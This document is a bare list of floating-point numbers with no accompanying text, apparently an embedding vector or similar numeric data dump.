-0.010321414098143578, 0.002189063001424074, 0.0006288597360253334, -0.01510345283895731, -0.005301354918628931, 0.012434743344783783, -0.0061957333236932755, 0.011049899272620678, 0.0076959808357059956, -0.026283180341124535, -0.0031375365797430277, -0.009289993904531002, -0.029802992939949036, 0.006029840558767319, 0.014360541477799416, -0.0003942206676583737, -0.0049876016564667225, 0.0345056913793087, 0.004179775714874268, 0.005488886032253504, 0.00258215656504035, 0.0025046197697520256, -0.006502274423837662, 0.020960187539458275, 0.006448179017752409, -0.012038042768836021, 0.0269756019115448, -0.016445020213723183, -0.0076743424870073795, -0.004980388563126326, -0.018118372187018394, 0.01109317597001791, 0.003352115396410227, 0.006361626088619232, 0.005918043199926615, 0.0015218856278806925, -0.0031645845156162977, -0.014887070283293724, -0.0004936210461892188, -0.026037948206067085, 0.007984490133821964, 0.027249686419963837, -0.0037758632097393274, 0.017411526292562485, 0.0028941070195287466, 0.013466163538396358, 0.03698686882853508, -0.010371902957558632, 0.0035594813525676727, -0.009975203312933445, -0.022229628637433052, 0.02559075877070427, 0.02779785357415676, 0.011316770687699318, 0.017454801127314568, -0.02048414759337902, 0.010299775749444962, -0.009773246943950653, -0.02843257412314415, 0.022849922999739647, -0.004947931505739689, -0.015997830778360367, -0.011158090084791183, 0.014086457900702953, 0.024148212745785713, 0.006844879128038883, 0.03926609084010124, -0.004071584902703762, -0.006563582457602024, -0.012716039083898067, -0.031505197286605835, -0.0073569826781749725, 0.002800341695547104, 0.028172915801405907, -0.003298019990324974, -0.02009466104209423, 0.0025965820532292128, -0.002116935793310404, 0.024148212745785713, -0.01966189593076706, -0.02264796569943428, -0.023455791175365448, -0.039064135402441025, 0.01208853255957365, -0.012845868244767189, -0.018046244978904724, 0.012441955506801605, 0.0037001294549554586, 0.01448315754532814, 0.0003110489051323384, -0.018406881019473076, -0.03819860890507698, -0.02031104266643524, 0.02828831970691681, -0.029442355036735535, 0.021493930369615555, 0.01852228492498398, -0.00038881110958755016, -0.0198061503469944, 0.03943919762969017, 0.014930346980690956, 0.030264606699347496, -0.00008486225124215707, 0.00926114246249199, -0.00009415991371497512, 0.020152362063527107, -0.023614471778273582, -0.0006405804306268692, -0.0040102768689394, 0.0011684619821608067, -0.0014218089636415243, 0.016142085194587708, 0.02534552663564682, 0.034592244774103165, -0.0006513994885608554, 0.02062840200960636, 0.004060765728354454, -0.0007649999461136758, 0.02872108295559883, 0.021349674090743065, 0.027624748647212982, -0.028850913047790527, -0.00507776066660881, 0.01817607507109642, 0.02165260910987854, -0.014959197491407394, 0.0054059396497905254, 0.0384005643427372, -0.03268808498978615, 0.0035666939802467823, -0.018305903300642967, 0.020152362063527107, 0.01189378835260868, 0.026066798716783524, 0.011057112365961075, 0.016848932951688766, 0.018132798373699188, 0.010357477702200413, -0.03346705809235573, -0.01647387072443962, -0.0340152271091938, 0.003389982273802161, 0.014757241122424603, -0.03297659382224083, -0.006386870518326759, 0.01703646406531334, 0.009549652226269245, -0.03286118805408478, 0.00018358646775595844, 0.013999905437231064, 0.0057557569816708565, 0.015824725851416588, 0.03730423003435135, 0.007501237094402313, 0.007342556957155466, 0.03265923261642456, -0.027307387441396713, 0.03955459967255592, 0.004839740693569183, -0.02094576135277748, 0.0008136858814395964, 0.005222015082836151, 0.043651431798934937, -0.012413104996085167, -0.025893693789839745, -0.023340387269854546, -0.028071938082575798, -0.014786092564463615, 0.0027011665515601635, -0.014843794517219067, 0.02325383573770523, -0.010876793414354324, 0.0013577960198745131, 0.01216065976768732, 0.020830359309911728, 0.008936570025980473, -0.018305903300642967, 0.01009781938046217, 0.02087363414466381, -0.017022037878632545, 0.02123427204787731, -0.01569489575922489, -0.00043501766049303114, -0.014021542854607105, 0.014721177518367767, 0.012276062741875648, -0.011013835668563843, 0.0021403769496828318, -0.045093975961208344, 0.011158090084791183, -0.013408461585640907, -0.0031104888767004013, 0.013148803263902664, 0.016170935705304146, 0.012304914183914661, -0.017166292294859886, -0.005860341712832451, 0.04792136326432228, -0.022417157888412476, -0.0001507910928921774, 0.016603700816631317, -0.018507860600948334, -0.009116888046264648, -0.0035017793998122215, 0.03972770646214485, -0.0100256921723485, -0.018507860600948334, 0.016906633973121643, 0.015795873478055, 0.006675379816442728, -0.009520800784230232, -0.02598024718463421, -0.00975882075726986, -0.04668077453970909, 0.01686335727572441, -0.005258078686892986, -0.0002081548300338909, 0.02413378842175007, -0.013040612451732159, -0.013430099934339523, 0.02872108295559883, -0.02612450160086155, -0.009484737180173397, 0.010920070111751556, 0.013422886840999126, -0.004024702124297619, 0.013069462962448597, -0.0016616322100162506, -0.0015056569827720523, 0.010545008815824986, -0.011143664829432964, 0.019921554252505302, -0.01778658665716648, -0.025460930541157722, 0.00458729499951005, -0.02041202038526535, 0.022171925753355026, -0.008417253382503986, -0.013293057680130005, -0.012124596163630486, 0.005030877888202667, -0.008792315609753132, 0.0057665761560201645, 0.005918043199926615, -0.0018897347617894411, -0.012629486620426178, -0.010609922930598259, 0.004778432194143534, -0.017209568992257118, 0.0014109899057075381, 0.002299057086929679, 0.010451243259012699, 0.06728032976388931, -0.02012351155281067, -0.014209073968231678, -0.014136946760118008, -0.032428424805402756, -0.01531983446329832, -0.007609427906572819, -0.0224748607724905, -0.007230760063976049, -0.0011612492380663753, -0.003281791228801012, -0.02257583849132061, -0.015507365576922894, 0.030610818415880203, 0.00013140689407009631, -0.04007391631603241, -0.00036334118340164423, -0.010855155996978283, -0.0052148024551570415, 0.004533199593424797, 0.03326510265469551, 0.01767118275165558, 0.016603700816631317, -0.004717124160379171, 0.01572374626994133, -0.03404407575726509, 0.010299775749444962, 0.0011991159990429878, -0.019748449325561523, 0.0062173716723918915, -0.014858219772577286, -0.03439028561115265, 0.0018383440328761935, 0.0029716440476477146, 0.007522875443100929, 0.0055898642167449, -0.00807825569063425, -0.009059186093509197, -0.005243653431534767, -0.01686335727572441, -0.016733529046177864, -0.02860567905008793, 0.031158985570073128, -0.01686335727572441, 0.009852586314082146, 0.009362121112644672, -0.0028237830847501755, -0.015435238368809223, -0.013769097626209259, 0.02960103563964367, 0.014014330692589283, 0.02456655167043209, -0.0020339894108474255, -0.010458455421030521, -0.0080205537378788, 0.008525444194674492, 0.004594507627189159, 0.008330700919032097, -0.022316180169582367, -0.029802992939949036, -0.0063291690312325954, -0.008121531456708908, -0.005142675247043371, 0.008215297013521194, -0.018796369433403015, 0.012023617513477802, 0.004158137831836939, -0.0002033087657764554, -0.006913399789482355, -0.01268718857318163, 0.004500742070376873, -0.010696475394070148, 0.00751566281542182, 0.0016922863433137536, 0.014944772236049175, -0.010645986534655094, 0.016372893005609512, 0.012946846894919872, -0.04711353778839111, -0.00931884441524744, -0.005968532525002956, 0.011605279520154, 0.003357524983584881, -0.0134878009557724, -0.013711395673453808, 0.018262626603245735, -0.01224721223115921, 0.02371544949710369, -0.002840011613443494, 0.010920070111751556, -0.00408240407705307, -0.0011053505586460233, -0.007840235717594624, 0.004893836099654436, 0.017743311822414398, 0.016762379556894302, 0.004940718878060579, -0.03286118805408478, -0.02233060635626316, -0.006119999568909407, 0.018060671165585518, -0.008049404248595238, -0.007638278882950544, -0.021984394639730453, 0.012434743344783783, -0.019993681460618973, -0.001509263296611607, 0.0053265998139977455, -0.009838161058723927, 0.017901990562677383, -0.014346116222441196, 0.00637244526296854, 0.022229628637433052, 0.010458455421030521, 0.00458729499951005, 0.024263616651296616, 0.013639268465340137, -0.011634130030870438, 0.005961319897323847, 0.01540638692677021, -0.009578502736985683, -0.0039633940905332565, 0.012038042768836021, 0.01166298147290945, -0.0006712345057167113, 0.005243653431534767, 0.001909569720737636, 0.017988543957471848, -0.007191089913249016, 0.01176395919173956, -0.003352115396410227, 0.020772656425833702, 0.004201414063572884, -0.04440155252814293, -0.013379610143601894, -0.021594908088445663, 0.0060154153034091, -0.018435733392834663, -0.005838703364133835, 0.017195142805576324, 0.007955638691782951, -0.04209348186850548, -0.029976097866892815, -0.015089026652276516, -0.005438396707177162, -0.0022720093838870525, -0.016877783462405205, -0.0011783794034272432, -0.006639316212385893, -0.004370913375169039, 0.02918269671499729, 0.03990081325173378, -0.004093223251402378, 0.00889329332858324, -0.0161565113812685, -0.014959197491407394, -0.00544921588152647, -0.003833564929664135, -0.009910288266837597, 0.003242121310904622, -0.0033755567856132984, 0.001055763103067875, -0.027004454284906387, -0.004244690295308828, -0.0002517692919354886, -0.007450748234987259, 0.006978314369916916, -0.02260468900203705, -0.0022251266054809093, 0.022056521847844124, 0.012254425324499607, -0.0021998819429427385, 0.014814943075180054, -0.006033447105437517, -0.0029608248732984066, 0.005813458934426308, 0.011352834291756153, -0.009564077481627464, -0.005395120475441217, 0.014447093941271305, -0.00926114246249199, 0.03170715272426605, -0.000753279309719801, 0.017022037878632545, 0.0154929393902421, -0.003970606718212366, 0.0026669062208384275, 0.02140737697482109, -0.013271419331431389, 0.03802550211548805, 0.01807509735226631, -0.007631066255271435, 0.005903617944568396, 0.0021097229328006506, -0.03392867371439934, -0.015161153860390186, -0.010609922930598259, -0.0013532880693674088, 0.009419823065400124, 0.01066762488335371, 0.025922544300556183, 0.009239505045115948, 0.016690252348780632, -0.0020592338405549526, 0.027711300179362297, -0.0006351708434522152, 0.002106116618961096, 0.005853128619492054, 0.0016445020446553826, -0.006779964547604322, -0.016315190121531487, -0.014360541477799416, -0.017772162333130836, 0.014237925410270691, 0.01839245669543743, 0.020613975822925568, 0.028547978028655052, 0.004266328644007444, 0.00444664666429162, -0.010119457729160786, -0.007681555580347776, 0.01966189593076706, -0.006967495195567608, 0.017743311822414398, -0.010234860703349113, -0.002172834239900112, -0.006603252608329058, 0.02218635194003582, -0.008056617341935635, 0.01856556162238121, -0.010465668514370918, -0.0012856688117608428, -0.004396157804876566, 0.03724652901291847, -0.00026889951550401747, -0.0022521743085235357, -0.002931973896920681, -0.019676322117447853, 0.011186941526830196, -0.0037289804313331842, -0.0045259869657456875, -0.009571289643645287, -0.022922050207853317, -0.0012469004141166806, -0.005831490736454725, 0.011670193634927273, -0.0035017793998122215, -0.026845773681998253, -0.012009192258119583, 0.008547082543373108, -0.007414684630930424, -0.008597571402788162, -0.011331195943057537, 0.012456381693482399, -0.0010575662599876523, 0.007429109886288643, -0.025619609281420708, 0.007883511483669281, -0.014973623678088188, 0.007219940889626741, 0.0057773953303694725, 0.020599551498889923, 0.0040319147519767284, -0.010068967938423157, 0.012896358035504818, 0.004298785701394081, -0.012773741036653519, -0.029687589034438133, 0.01873866654932499, 0.00153991742990911, -0.004021096043288708, -0.020830359309911728, -0.008157595060765743, -0.008345126174390316, 0.007421897258609533, -0.015795873478055, 0.0154929393902421, -0.02026776596903801, -0.004663028754293919, -0.019474364817142487, -0.01503132563084364, 0.015074601396918297, 0.014800517819821835, -0.0064445724710822105, -0.0023116793017834425, 0.0015570477116852999, 0.007328131701797247, 0.0028382085729390383, -0.013293057680130005, 0.0037758632097393274, 0.0030365583952516317, -0.025042591616511345, 0.000029837026886525564, -0.006386870518326759, -0.0020375957246869802, -0.013660906814038754, -0.00645178509876132, -0.003180813044309616, -0.0047423685900866985, 0.03361131250858307, -0.017050888389348984, -0.04027587175369263, -0.021003464236855507, 0.0004832527774851769, -0.00817923340946436, 0.001019699382595718, -0.011771172285079956, -0.023311536759138107, -0.011042686179280281, -0.0007956540794111788, 0.024754082784056664, -0.02123427204787731, 0.009946351870894432, 0.003175403457134962, -0.007097324356436729, -0.013992692343890667, -0.028807636350393295, -0.004738762509077787, 0.003909298684448004, -0.02850470133125782, 0.005442003253847361, -0.011388897895812988, -0.018623264506459236, -0.0100256921723485, 0.012881931848824024, 0.04163186624646187, 0.0005973040242679417, -0.019993681460618973, -0.013300270773470402, 0.012463593855500221, -0.016704678535461426, -0.004251903388649225, -0.0008492987253703177, 0.004691879730671644, 0.0014722980558872223, -0.005553800612688065, 0.00951358862221241, -0.009470311924815178, -0.03635215014219284, -0.007638278882950544, 0.011309557594358921, -0.013884501531720161, 0.011605279520154, 0.0001495514006819576, 0.010422391816973686, 0.020065808668732643, 0.00043704622657969594, -0.012304914183914661, -0.014072032645344734, 0.015536216087639332, 0.0019780907314270735, 0.00901591032743454, -0.003988638520240784, -0.007216334342956543, 0.011085962876677513, -0.013790735974907875, 0.012369828298687935, -0.003772256663069129, -0.018983900547027588, -0.003357524983584881, -0.03525581583380699, -0.0032583498395979404, 0.007212728261947632, -0.009686693549156189, -0.005185951478779316, 0.011706257238984108, 0.007703193463385105, -0.008337914012372494, 0.020397594198584557, 0.01073975209146738, 0.0240616612136364, 0.006383264437317848, 0.009506375528872013, 0.0035270240623503923, -0.02136410027742386, 0.019474364817142487, -0.01927240937948227, -0.0047423685900866985, -0.001565161976031959, 0.015795873478055, 0.01102104876190424, -0.008878868073225021, 0.00958571583032608, 0.0034603062085807323, 0.020541848614811897, 0.0014578726841136813, 0.01531983446329832, 0.02158048190176487, 0.005160707049071789, -0.007093717809766531, -0.003150159027427435, -0.017656758427619934, 0.009578502736985683, -0.0005247259396128356, 0.005131856072694063, -0.016949910670518875, 0.010920070111751556, -0.027552621439099312, 0.0076959808357059956, -0.0017409722786396742, -0.02797095850110054, 0.008914931677281857, 0.0019239952089264989, -0.010465668514370918, -0.02388855442404747, -0.002052021212875843, -0.01757020503282547, 0.005853128619492054, -0.006134425289928913, 0.019618621096014977, -0.01439660508185625, 0.021248696371912956, -0.002699363511055708, 0.005395120475441217, -0.0063291690312325954, -0.019690748304128647, 0.03309199586510658, -0.012896358035504818, 0.012413104996085167, -0.0033917853143066168, -0.009059186093509197, 0.00588197959586978, 0.023902980610728264, 0.0038876603357493877, 0.006747507024556398, -0.0002959472476504743, 0.011064324527978897, 0.000039810878661228344, -0.012449168600142002, 0.013076676055788994, 0.00031240127282217145, 0.004331243224442005, -0.007854660972952843, -0.016531571745872498, 0.007789746392518282, -0.009549652226269245, 0.015983404591679573, 0.01725284568965435, 0.008691336959600449, -0.01977729983627796, 0.011655768379569054, 0.023917406797409058, 0.006574401631951332, -0.00005671570761478506, -0.0008502003038302064, 0.0039633940905332565, -0.018262626603245735, -0.006527518853545189, -0.0027210016269236803, 0.013177653774619102, 0.013422886840999126, 0.015565067529678345, -0.008547082543373108, -0.000023624501409358345, 0.009383759461343288, 0.009946351870894432, 0.0034981730859726667, 0.011136451736092567, 0.01208853255957365, 0.012874719686806202, -0.01240589190274477, -0.003301626304164529, -0.004677454009652138, 0.01139611005783081, 0.019358962774276733, -0.00944146141409874, 0.008085467852652073, -0.006163276266306639, 0.02009466104209423, 0.0061957333236932755, 0.013848437927663326, -0.007833022624254227, 0.00022663743584416807, 0.02797095850110054, 0.0025965820532292128, -0.0006991838454268873, 0.0048866234719753265, -0.00004631923729903065, 0.00029662344604730606, 0.01040075346827507, 0.007789746392518282, -0.0007645491859875619, 0.0198061503469944, 0.0065455506555736065, 0.0016363876638934016, 0.002461343538016081, -0.028490275144577026, -0.013949415646493435, -0.013357972726225853, -0.010537795722484589, 0.006769145373255014, 0.013711395673453808, -0.018969474360346794, -0.007465173490345478, -0.006902580615133047, 0.012766528874635696, -0.029514482244849205, 0.008200871758162975, -0.012773741036653519, 0.020498573780059814, 0.006487848702818155, -0.001349681755527854, 0.006989133544266224, 0.02505701780319214, -0.0010656805243343115, -0.014685113914310932, 0.0033611312974244356, 0.0031213080510497093, -0.00594689417630434, 0.011295132339000702, 0.010653199627995491, -0.01793084107339382, 0.009506375528872013, 0.019142579287290573, -0.01866653934121132, 0.0018771124305203557, 0.017411526292562485, 0.02215750142931938, -0.002192669315263629, -0.012997335754334927, -0.0032890040893107653, -0.015464088879525661, 0.02109001763164997, 0.01778658665716648, 0.005211195908486843, -0.010480093769729137, 0.003606364130973816, 0.026009097695350647, -0.012369828298687935, -0.005243653431534767, 0.009715544991195202, -0.02225847914814949, -0.009636204689741135, 0.005276110488921404, 0.015579492785036564, -0.026095649227499962, 0.00017569753981661052, 0.0201667882502079, -0.005647566169500351, 0.002486587967723608, -0.008034978993237019, 0.011208578944206238, -0.008792315609753132, -0.00515710050240159, -0.013076676055788994, 0.009398184716701508, -0.02804308570921421, 0.017685608938336372, -0.016445020213723183, -0.008929356932640076, -0.018479010090231895, 0.009340482763946056, -0.020253339782357216, 0.010537795722484589, 0.001666140160523355, 0.019993681460618973, -0.0037542248610407114, -0.006289498880505562, 0.01650272123515606, -0.011114814318716526, -0.005222015082836151, 0.01524770725518465, 0.001520082470960915, -0.009347695857286453, 0.009787672199308872, -0.008871655911207199, -0.01608438417315483, 0.008871655911207199, -0.013336334377527237, -0.024090511724352837, 0.02109001763164997, -0.007010771427303553, 0.01309831440448761, 0.027494918555021286, 0.012369828298687935, -0.009628991596400738, -0.012860294431447983, -0.0021187388338148594, -0.00035139507963322103, 0.015882426872849464, 0.013624843209981918, 0.007288461551070213, 0.005672810599207878, 0.009282780811190605, -0.031822554767131805, -0.03848711773753166, 0.0069855269975960255, -0.007508449722081423, 0.05299912393093109, -0.0016417972510680556, -0.004349275026470423, 0.005770182237029076, 0.010833517648279667, -0.016632551327347755, -0.014930346980690956, 0.011994767002761364, -0.020065808668732643, -0.016387317329645157, 0.0223594568669796, 0.017310546711087227, 0.023196132853627205, -0.008294637314975262, -0.0049515375867486, -0.004457465838640928, -0.011691831983625889, -0.018060671165585518, -0.0013046021340414882, -0.02062840200960636, 0.002243158407509327, -0.01767118275165558, 0.005968532525002956, -0.0035216144751757383, 0.02658611536026001, 0.00967226829379797, -0.004486316815018654, -0.010552220977842808, -0.01290357019752264, 0.0022251266054809093, 0.0022647965233772993, -0.00047558924416080117, -0.010393541306257248, 0.005856735166162252, 0.03773699328303337, -0.005027271341532469, 0.030783923342823982, -0.02694675140082836, -0.012441955506801605, -0.0013055037707090378, 0.011742320843040943, 0.015997830778360367, 0.019676322117447853, -0.0007704095332883298, 0.003992245066910982, -0.014064819552004337, 0.005175132304430008, 0.014771667309105396, -0.009289993904531002, -0.01878194324672222, 0.004522380419075489, -0.003743405919522047, -0.007259610574692488, 0.0099030751734972, -0.003912904765456915, 0.0006031643715687096, 0.011331195943057537, -0.01517558004707098, -0.0050705475732684135, -0.008280212059617043, -0.005398727022111416, -0.033813267946243286, -0.002739033428952098, 0.005607896018773317, 0.01533425971865654, -0.03063966892659664, 0.019358962774276733, 0.008157595060765743, 0.008850017562508583, -0.022546987980604172, -0.0019528460688889027, 0.02019563876092434, -0.011814448051154613, 0.00006491455133073032, -0.009535226039588451, -0.008121531456708908, -0.003281791228801012, -0.004421402234584093, 0.007479598745703697, 0.009802097454667091, -0.0023080729879438877, -0.0058783735148608685, 0.004421402234584093, -0.009268355555832386, -0.00765991723164916, -0.021277546882629395, 0.010819092392921448, -0.01453364733606577, 0.00608032988384366, 0.025071442127227783, -0.0139133520424366, -0.01618536189198494, -0.007050441578030586, 0.0016372893005609512, 0.002248567994683981, 0.010090606287121773, -0.012413104996085167, -0.01517558004707098, -0.005506917834281921, 0.005470854230225086, -0.008640848100185394, -0.027278536930680275, -0.02655726484954357, 0.008669699542224407, -0.016517147421836853, 0.01416579820215702, 0.02051299810409546, -0.0050705475732684135, 0.00041518264333717525, -0.006718656048178673, -0.003169993869960308, -0.008042192086577415, 0.000028371941880322993, -0.02427804283797741, -0.013004548847675323, -0.0026614966336637735, 0.00040368735790252686, -0.008467743173241615, 0.0027534589171409607, 0.012615061365067959, -0.005928862374275923, -0.006603252608329058, -0.03211106359958649, 0.00508497329428792, -0.011583641171455383, 0.027321813628077507, -0.018680965527892113, 0.00035026809200644493, 0.017685608938336372, 0.012723252177238464, -0.013192079961299896, -0.018089521676301956, -0.006314743310213089, -0.02825946919620037, 0.01409367099404335, -0.0032619561534374952, -0.0040427339263260365, -0.010249286890029907, 0.02872108295559883, -0.010617136023938656, -0.008619209751486778, 0.0201667882502079, 0.011280707083642483, 0.012874719686806202, 0.015391961671411991, 0.01696433685719967, 0.017512504011392593, -0.01703646406531334, 0.018753092736005783, -0.0043023922480642796, -0.0206572525203228, 0.002385609783232212, 0.02023891545832157, 0.0018861283315345645, 0.010624348185956478, -0.01625748910009861, -0.006570795085281134, -0.0004541764792520553, -0.016300765797495842, -0.014454307034611702, 0.0015029521891847253, 0.028418147936463356, -0.00047919561620801687, 0.0055898642167449, 0.006177701521664858, 0.021566057577729225, 0.009939138777554035, 0.0016706481110304594, -0.0024379021488130093, 0.0044250087812542915, 0.023975107818841934, -0.005802639760077, -0.004663028754293919, -0.020642828196287155, 0.029629886150360107, -0.0136104179546237, 0.0053770886734128, -0.008741826750338078, -0.0011549381306394935, -0.008042192086577415, 0.00680520897731185, -0.008135957643389702, -0.011792810633778572, -0.009967990219593048, -0.014028755947947502, -0.016906633973121643, -0.002526257885619998, 0.009578502736985683, 0.02651398815214634, -0.006314743310213089, 0.008684124797582626, -0.004385338630527258, 0.0044935294426977634, -0.018479010090231895, -0.00793400127440691, 0.025042591616511345, 0.0025749439373612404, -0.031043581664562225, -0.004453859757632017, -0.00020511195180006325, 0.01068205013871193, 0.016921060159802437, 0.00045778282219544053, -0.01793084107339382, 0.002244961680844426, 0.003105079522356391, -0.019604194909334183, -0.009924713522195816, -0.017829863354563713, 0.01718071848154068, -0.011100388132035732, -0.012679975479841232, -0.007501237094402313, 0.003317854832857847, 0.00013760532601736486, 0.008330700919032097, -0.00011185363109689206, -0.00807825569063425, 0.0007194696227088571, 0.015089026652276516, 0.009542439132928848, -0.005218408536165953, 0.010061755776405334, 0.010501732118427753, -0.01710859127342701, 0.00774646969512105, 0.004039127845317125, 0.0056223212741315365, 0.007407471537590027, -0.00008018525113584474, -0.02172473631799221, -0.007342556957155466, -0.010141095146536827, 0.023542344570159912, 0.008208084851503372, -0.006844879128038883, 0.02279222011566162, -0.02352791838347912, -0.0055898642167449, -0.0012829640181735158, -0.02111886814236641, -0.013718608766794205, 0.00047784321941435337, -0.0028706658631563187, 0.005791820585727692, 0.004049947019666433, -0.0013911549467593431, -0.020758232101798058, 0.0027732939925044775, -0.011439386755228043, -0.027538195252418518, -0.004612539429217577, -0.01824820227921009, 0.03248612582683563, -0.0016012255800887942, -0.010451243259012699, -0.018291478976607323, 0.013675332069396973, -0.006978314369916916, 0.02432131953537464, -0.012312126345932484, -0.0005761166685260832, -0.01325699407607317, -0.005918043199926615, 0.02313843183219433, -0.0030563934706151485, -0.019012751057744026, 0.02044087089598179, 0.003307035891339183, -0.009030335582792759, 0.01183608639985323, 0.0019690748304128647, -0.00765991723164916, -0.0053770886734128, -0.017599055543541908, 0.0005891897017136216, 0.007284855470061302, 0.012521295808255672, -0.006437359843403101, 0.0040535531006753445, 0.025547482073307037, -0.028865337371826172, -0.00975882075726986, 0.010263712145388126, -0.00857593398541212, -0.004919080529361963, 0.010299775749444962, -0.00637965789064765, 0.0061849141493439674, 0.014504795894026756, -0.0028688625898212194, 0.0007203712011687458, -0.0015804889844730496, 0.0029247612692415714, -0.010573859326541424, -0.004681060556322336, -0.0048325276002287865, 0.001749988179653883, 0.015608343295753002, 0.004107648506760597, -0.000016158201106009074, -0.006202945951372385, 0.01334354653954506, -0.01764233224093914, 0.02143622748553753, 0.012225573882460594, 0.003346705809235573, -0.022777795791625977, -0.020642828196287155, -0.01640174351632595, 0.002080871956422925, 0.003656853223219514, -0.002674118848517537, 0.0074579608626663685, 0.014742815867066383, -0.0052039832808077335, 0.011085962876677513, -0.0030365583952516317, -0.016199788078665733, -0.002102510305121541, 0.01025649905204773, -0.0022756156977266073, 0.010040117427706718, 0.01503132563084364, 0.008770677261054516, 0.008878868073225021, 0.007905149832367897, -0.007753682788461447, 0.017137441784143448, 0.026932327076792717, -0.005247259512543678, 0.0037109486293047667, -0.009773246943950653, 0.007014377973973751, -0.004129286855459213, -0.009138526394963264, -0.006624890491366386, 0.008936570025980473, 0.007544513326138258, -0.0100256921723485, -0.00708289910107851, 0.0006220978102646768, 0.029052868485450745, 0.004244690295308828, 0.005247259512543678, -0.027134282514452934, 0.010545008815824986, 0.013076676055788994, 0.0233259629458189, 0.015449663624167442, -0.012752103619277477, -0.017916416749358177, -0.01654599793255329, -0.005712480749934912, 0.00239642895758152, 0.005276110488921404, -0.00480007054284215, -0.02019563876092434, -0.004118467681109905, 0.011388897895812988, 0.0430167093873024, -0.004136499483138323, -0.009059186093509197, -0.017728885635733604, -0.000048319641791749746, -0.0012955862330272794, -0.00012520844757091254, -0.0005044401623308659, 0.009268355555832386, 0.0006897171260789037, -0.008366764523088932, -0.006177701521664858, 0.003124914364889264, 0.009665055200457573, -0.017483653500676155, 0.005359056871384382, 0.006891761440783739, 0.0022575838956981897, -0.02111886814236641, 0.005936075001955032, 0.015290983021259308, -0.0025208485312759876, 0.005066941492259502, 0.015839150175452232, -0.01341567374765873, 0.016372893005609512, 0.024191489443182945, 0.0032601531129330397, 0.018378030508756638, -0.007479598745703697, -0.0005801738006994128, -0.02957218512892723, 0.007317312527447939, 0.013588779605925083, -0.017065314576029778, 0.008186446502804756, 0.0012306717690080404, -0.0067835706286132336, -0.006101967766880989, -0.012514082714915276, 0.01366811990737915, -0.009152951650321484, 0.011259068734943867, 0.005117430351674557, 0.0034170299768447876, 0.002344136592000723, 0.001999728847295046, 0.00508497329428792, 0.0038876603357493877, -0.006062298081815243, -0.015045750886201859, -0.0009935533162206411, -0.0026867412962019444, -0.019185855984687805, 0.010552220977842808, -0.01611323468387127, -0.0136104179546237, -0.005990170408040285, -0.017599055543541908, 0.012369828298687935, 0.011381684802472591, -0.0050885798409581184, 0.029802992939949036, 0.010032904334366322, -0.004991207737475634, -0.003139339853078127, 0.011194153688848019, 0.010732538998126984, -0.00637244526296854, -0.0014668885851278901, 0.001929404796101153, 0.009304419159889221, 0.0119082136079669, -0.007811384275555611, -0.01710859127342701, 0.014014330692589283, 0.008712975308299065, -0.01679123006761074, 0.017137441784143448, -0.0062281908467411995, 0.028519127517938614, -0.0062065524980425835, 0.0015299998922273517, -0.009376546368002892, -0.0031627812422811985, 0.0025406833738088608, -0.00873461365699768, 0.012001979164779186, 0.011287919245660305, -0.00680520897731185, -0.023224983364343643, 0.026283180341124535, -0.015391961671411991, 0.01618536189198494, -0.02510029263794422, 0.012838656082749367, 0.014295627363026142, -0.00600820267572999, -0.012643911875784397, -0.0256340354681015, 0.01426677592098713, 0.018219351768493652, 0.0012550146784633398, 0.010487306863069534, -0.0018807188607752323, 0.01531983446329832, 0.004926293157041073, -0.002142180223017931, 0.01089843176305294, 0.004071584902703762, 0.008878868073225021, -0.006563582457602024, -0.007905149832367897, -0.009203440509736538, 0.016805656254291534, -0.010357477702200413, -0.011114814318716526, -0.008431678637862206, 0.015795873478055, 0.012824230827391148, 0.01938781328499317, -0.034274883568286896, -0.037967801094055176, 0.010927283205091953, -0.02104674093425274, 0.004789251368492842, -0.011013835668563843, 0.015305409207940102, -0.0002423025871394202, -0.01409367099404335, -0.0006590630509890616, -0.004363700281828642, 0.019546493887901306, 0.0038371712435036898, -0.02080150693655014, 0.01594012975692749, 0.0027155920397490263, 0.002744443016126752, -0.0037289804313331842, 0.0009809309849515557, 0.024797359481453896, 0.024681955575942993, -0.013422886840999126, 0.0007154124905355275, -0.017440376803278923, 0.013884501531720161, -0.0014831172302365303, 0.007429109886288643, 0.0009502769098617136, 0.0027137889992445707, -0.019214708358049393, 0.01788756623864174, 0.01368254516273737, -0.013228143565356731, 0.015536216087639332, -0.005485279485583305, -0.00923229195177555, -0.006260647904127836, 0.008619209751486778, -0.0017626103945076466, 0.0048649851232767105, 0.013834012672305107, -0.028057511895895004, 0.0020033351611346006, 0.006559976376593113, -0.00033989979419857264, 0.008655273355543613, -0.002695757197216153, 0.006047872360795736, 0.015435238368809223, 0.02194111794233322, 0.010638773441314697, -0.01912815496325493, 0.002333317417651415, 0.0011134649394080043, 0.005914437118917704, -0.0037975013256073, -0.009715544991195202, 0.015824725851416588, -0.0013487801188603044, 0.0027588685043156147, 0.014728390611708164, -0.005553800612688065, 0.0017716262955218554, -0.009066399186849594, 0.005160707049071789, 0.0015994224231690168, 0.00408961670473218, 0.0008786004618741572, -0.01885407045483589, -0.01594012975692749, -0.008604784496128559, -0.014245137572288513, 0.020700529217720032, 0.0031880259048193693, -0.0024036415852606297, -0.007638278882950544, -0.015882426872849464, -0.001346976961940527, -0.005142675247043371, -0.014706752263009548, -0.006109180860221386, -0.01533425971865654, -0.007216334342956543, -0.0017716262955218554, 0.01987827755510807, 0.0037902884650975466, -0.01725284568965435, -0.024047235026955605, 0.013646481558680534, 0.010393541306257248, -0.003352115396410227, -0.01596898026764393, 0.019229132682085037, 0.006509487051516771, -0.027668025344610214, -0.013040612451732159, 0.02473965659737587, 0.0012874719686806202, -0.028129639104008675, -0.010480093769729137, -0.002989675849676132, 0.006285892333835363, -0.020931337028741837, 0.0024541306775063276, -0.012074106372892857, -0.011684619821608067, 0.008114319294691086, 0.022013245150446892, 0.0037037357687950134, -0.009225078858435154, -0.009722757153213024, 0.009304419159889221, -0.0021584087517112494, -0.008099894039332867, 0.003591938642784953, -0.004179775714874268, 0.006109180860221386, -0.003525220789015293, -0.00014481805555988103, 0.007313706446439028, -0.004266328644007444, 0.0184645839035511, -0.0018915379187092185, 0.00724157877266407, 0.012961272150278091, 0.017772162333130836, 0.0009178196196444333, 0.005391514394432306, 0.011965915560722351, -0.001089121913537383, -0.013855650089681149, 0.003242121310904622, 0.006711443420499563, -0.0037289804313331842, 0.005730512551963329, -0.0013884501531720161, 0.0035125985741615295, 0.0015354094794020057, 0.002102510305121541, -0.013163228519260883, 0.01324256882071495, 0.003054590430110693, -0.016387317329645157, 0.02896631509065628, 0.000658161414321512, 0.0016372893005609512, 0.0024216733872890472, -0.018839646130800247, -0.016661401838064194, 0.0062173716723918915, -0.0026560870464891195, 0.021638184785842896, 